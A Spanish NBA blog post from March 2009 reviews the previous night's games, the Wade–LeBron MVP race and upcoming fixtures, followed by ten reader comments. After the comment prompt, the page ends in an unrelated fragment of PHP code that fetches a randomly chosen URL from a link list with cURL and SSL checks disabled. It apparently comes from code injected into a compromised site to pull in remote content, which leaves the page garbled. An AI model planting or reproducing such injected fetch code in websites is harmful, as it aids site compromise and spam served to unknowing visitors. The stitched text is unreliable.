La Crónica (14/03/2009)

15 de March de 2009 por Jabho

La jornada de ayer nos deja la replica de Wade al partidazo de Lebron en Sacramento… la carrera al MVP es cosa de dos. A pesar de Wade, y de alguna ayudita arbitral, los Heat necesitaron 3 prórrogas para doblegar a los Jazz bien guiados por Deron. Ya se sabe que los equipos de Sloan son cualquier cosa menos cómodos de ganar. Deron y Wade tuvieron tiros ganadores al final de cada prórroga, ambos fallaron pero en la última los Jazz se vinieron abajo y el partido se lo llevaron “cómodamente” los de Miami con Jermaine y Chalrmers destacados. Por cierto llegarán más records, pero de momento Wade es el máximo anotador de la historia de los Heat.

Nuestro partido de la jornada no defraudó y los Spurs, con muchos problemas y un Parker genial, ganaron a los Rockets en el apretado Oeste, lo que les da un respiro en la 2ª plaza. Ojito a los Spurs que con la incorporación de Gooden dan un salto de calidad que más la recupearción de Manu… Si el argentino vuelve bien para Abril serán mi apuesta en el Oeste por encima de los Lakers. Son mi debilidad. Por los Rockets ya lo comentamos hace unos días pero ¿donde se mete Battier durante los partidos? Anoche triple decisivo que se jugó Artest… ya sé que juegan casi mejor sin T-Mac y que además este no es el jugador que fue pero…

Y Chandler regresó a Chicago donde no jugó un gran partido y acabó en tablas en su duelo con Noah. Los Bulls ganaron a los Hornets y eso a pesar del repaso de CP3 a Rose. Los Bulls son ahora equipo de Play Offs, a ver los que les dura, y los Hornets en el “montonet” que hay liado en el Oeste.

Otro que regresó fue Camby a Denver. En mala hora. Los Clippers siguen a los suyo que es acumular opciones para el draft y Denver encadena su segunda victoria consecutiva, aunque si el ambiente entre entrenador y jugadores es malo como se rumorea para poco los valdrá. Carne de primera ronda parece ahora mismo a pesar de que este año han pintado mejor y a pesar del propio Billups.

Los Wolves vencieron a los Bobcats. Mira que se jugaban poco los de Minnesota y que se supone que los de Charlotte andan luchando por la 8ª del Este, pues ni con esas. Cerramos la jornada con la intrascendente victoria de los Suns ante los Thunder que volvieron a dejar buena imagen. Se rumorea que los Suns pueden ejerecer la opción que tienen de rescindir el contrato de Nash el año que viene y ahorrarse 13$ millones. Si por dios, que además es muy amigo de Garnett… ¿dónde hay que firmar?. Si eso pasa, candidato a la gran Manzana o a reforzar a alguno de los candidatos al anillo (el verde le sentaría de lujo)

PREMIOS

MVP: Ya sabemos que esto es hoy para Lebron y mañana para Wade o viceversa. En esta fase de la temporada no hay quien les tosa. Anoche el heat se fue a 50 puntos, 10 rebotes y 9 asistencias… además las sensaciones que deja por momentos es que es imparable. A todo esto tiene a los Heat 5º y con los Hawks a tiro de piedra.

Rookie: Buenos partidos de Westbrook, Augustin, Eric Gordon o Love. De todos sólo ganó Love, más el ganador del premio que no es otro que el 2ª ronda Chalmers que con sus 23 puntos, 5 robos y 4 asistencias ayudó y mucho a la victoria de Miami. Por ciero, delante de todo un miura como Deron. Pedazo de robo de draft.

La sorpresa: Ya hablamos de él hace poco y es que está aprovechando muy bien la ausencia de bruto Martin, Renaldo Balkman. De lo poco bueno que dejó Isiah es un notable ojo para esto del draft al menos en posiciones medias. Anoche Renaldo 22 puntos y 11 rebotes siendo el mejor de los Nuggets.

La Decepción: Viendo como están jugando sus compañeros de promoción ya parece claro que una de las decepciones de la temporada es Michael Beasley. Ni con Marion ni sin Marion, sigue dejando malos partidos salvo alguno aislado. Parece que le faltan ganas de trabajar y no es un buen principio.

Mayor esfuerzo en Vano: El de Deron Williams y sus Jazz contra los mediáticos Heat.

RAZONES PARA TRASNOCHAR

Ya sabeis que tarde de domingo son partidos desde las 17:30 de la tarde. 11 partidos además que da para todos los gustos. Nosotros destacamos:

Mavericks@Lakers: Hoy por hoy son enfrentamiento de primera ronda de Play Offs y aunque serían claros candidatos los angelinos, Kidd&Nowitzki enfrente son al menos para tomártelo en serio. Los Lakers pelean con los Cavs por liderato de la liga. No es baladí el objetivo viendo como está el asunto. Los Mavs porque están a 2 victorias del 3º de la conferencia y queda mucha tela por cortar a la hora de definir los emparejamientos para Play Offs. A partir de las 20:30 aproximadamente. Si cuando acabe seguís con ganas de baloncesto y no os importa acostaros un poco más tarde a las 23:00 empieza un Jazz@Magic que también pinta bien.

El jugador a seguir es…Devin Harris. Pero ojo, que es por ponernos originales que hoy juegan los Wade, Lebron, Dirk o Howard, jugadores en buenas rachas y con partidos importantes esta noche. Tambien Harris está jugando muy bien, casi 29 puntos y 10 asistencias en los últimos 5 partidos, y los Nets apuran sus opciones de colocarse de nuevo 8º y se entrenta a Baron Davis. Un vistazo a las noches de Lee o Murphy, otros jugando bien y con los Play Offs al alcance, tampoco sobra.

Comenta

10 comentarios a esta entrada

  1. xapa_croack dice:
    #1

    Esta claro que en el camino al mvp wade y lebron tienen ventaja aunque los de entre semana se empeñen en que no. Los spurs van de tapados pero pueden dar un disgusto incluso a los lideres.

      Citar

  2. TheDeerHunter dice:
    #2

    ¿qué pasa, Jabhito?? ¿que no juega Kobe esta noche???
    menuda memoria que tenéis los verdes…

    San Antonio…

      Citar

  3. Jabho dice:
    #3

    Juega, juega Kobe… Vamos, juegan los Lakers en el partido destacado, supongo que jugará. No soy yo mu sospechoso de Kobe porque me parece un supercrack, dicho esto está en una fase mas “normal” de su juego, que es mucho mejor que la mayoría… también juegan Powe y Allen, que están muy finos….

    Cuanta susceptibilidad… 🙂

      Citar

  4. sabas dice:
    #4

    Pienso que los Lakers con Bynum son superiores a los Spurs, el problema es saber cuando vuelve Bynum y en que condiciones; de todas formas hueso duro de roer los Spurs.

      Citar

  5. TheDeerHunter dice:
    #5

    susceptibilidad un poquito…. pero era coña,
    creando un poco de polémica

    para crack tú aunque seas de los celtics

      Citar

  6. MagicJohnson32 dice:
    #6

    “Los de entre semana”… manda huevos la cosa, cuando todos los debates en USA sitúan a Wade como el tercero en discordia gracias a este último tramo de temporada.

    A veces parece que no veamos más que los box scores.

      Citar

  7. aro_pasado_no_newtoniano dice:
    #7

    Hasta el de la gorra de Amaral sabe que en USA los debates en los que hay un tercero en discordia están descontextualizados, ya que allí imperan la dualidades; Republicanos-democratas, Norte-Sur, Spike-Lee, Kansas-Arkansas, etc. Vamos, que es como poner a hablar a Roncero de criptozoología.

      Citar

  8. TheDeerHunter dice:
    #8

    ¿estás seguro que sólo vemos box scores??

    te lo comento porque mi salud no dice lo mismo… y tampoco dice que Wade sea el 3º en discordia.

    una cosa es opinar que cualquier cosa que sea no pensar que Kobe es el mejor jugador del mundo y otra cosa es que este año se merezca el MVP…
    que no te pierdan los colores, Magic (ejem….)

      Citar

  9. MagicJohnson32 dice:
    #9

    A mí me la bufa el MVP. Ha habido cosas tan sangrantes con este premio que me da igual. Ya sabes: “¿Quién quiere al MVP cuando tiene al mejor jugador?”. Quiero decir… el MVP es un trasto de cristal o metraquilato o de lo que sea que está hecho el premio.

    Y cuando digo que “Wade es el tercero en discordia” no significa que Wade sea el 3er favorito, sino que ahora mismo hay 3 candidatos. Antes de esta racha tan brutal de Flash, los candidatos eran 2. Ahora, son 3. Y eso no lo digo yo.

    ¿Si Miami acaba 7º, alguien consideraría a Wade para el premio? Está 2,5 partidos por encima del 7º puesto. Si los Cavs y/o Lakers acaban con +20 partidos ganados más que los Heat, se me hace difícil pensar que se lo darán, vistos casos anteriores.

    Y por supuesto que no digo que veamos sólo box scores. Digo que “a veces parece que sólo veamos box scores”. Son cosas diferentes.

      Citar

  10. Jabho dice:
    #10

    Por alusiones te diré Magic que para mi hasta hace poco el MVP era cosa de uno, de Lebron. Ahora creo que Wade puede disputárselo.

    El MVP es un premio lo que en si mismo ya hace difícil muchas veces ponerse de acuerdo. Además con criterios pocos claros y muy difícil medir si fulanito lo merece mas que menganito en muchas ocasiones. Y está claro que no solo cuenta el nivel deportivo individual sino también el colectivo además para que engañarnos del marketing. Sinceramente juntándolo todo y añadiendo que Kobe ganó el año pasado creo que el premio era para Lebron. La cosa es que Wade ha subido un nivel, los Heat otro y de seguir así hasta final de campaña puede peleárselo.

    Y Kobe está haciendo un gran año, como siempre, pero salvo final de temporada brutal que no creo que llegue creo que no lo ganará. Como tampoco Duncan y ha sostenido a los Spurs en muchas fases del campeonato y está jugando un gran año.

    De todas formas como a ti al MVP le doy la importancia justa. El bueno será el MVP que daremos en tjnba 🙂 y para eso ya votaremos ¿no?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>